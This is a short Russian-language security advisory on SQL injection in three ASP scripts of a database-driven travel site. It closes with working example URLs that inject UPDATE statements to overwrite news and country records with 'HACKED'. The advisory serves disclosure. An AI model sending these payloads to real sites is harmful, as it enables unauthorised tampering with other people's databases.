Программа: Lotfian.com DATABASE DRIVEN TRAVEL SITE
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных сценариями NewsDetails.asp, Destination.asp и
RegionDetails.asp. Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.
Пример:
NewsDetails.asp?NewsID=''UPDATE gtsNews set NewsDescription='HACKED' UPDATE
gtsNews set NewsTitle='HACKED'
Destination.asp?CID=''UPDATE gtsCountry set CountyName='HACKED'
RegionDetails.asp?CID=''UPDATE gtsCountryRegion set CountryRegionName='hacked';--